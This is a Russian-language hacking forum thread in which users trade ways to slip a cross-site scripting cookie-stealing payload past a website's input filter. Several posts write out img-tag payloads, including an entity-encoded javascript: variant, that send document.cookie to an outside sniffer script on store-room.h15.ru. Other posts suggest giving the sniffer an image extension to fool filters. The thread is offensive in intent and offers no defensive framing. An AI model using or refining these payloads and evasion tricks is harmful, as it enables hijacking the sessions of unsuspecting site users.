Подскажите как обойти следующую фильтрацию:

До фильтрации:
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

или
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

После фильтрации:

<img src=/'http://store-room.h15.ru/sniff/sniff.php?/'+document.cookie></img>

Как бы это обойти?

мдя.... имхо тебе этот код ничего не даст. Надо чтобы текст интерпритировался браузером как ЯваКод. А тут просто адрес. И на снифф тебе придет ИП, реферер, а вместо кук document.cookie

Подскажите как обойти следующую фильтрацию?
Мдя....эт точно!

Сниффер возвращает браузеру прозрачный GIF-файл размером 1x1 px. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок. А у тебя что?? <img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>расширения php. Так не получется или я что то не так понял...щас не могу думать голова забита (

Попробуй

<img src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

Попробуй

<img src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>


че то не сработало =( Дай свою асю, поговорить надо.

Юзай античатовский снифер он с расшырением .gif должно пропустить

Короче теперь такая трабла, вроде обошел фильтрацию вот этим:

<img src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

но он не хочет выполняться =( куки не приходят =(. Также пробовал с античатовским снифером ни хрена!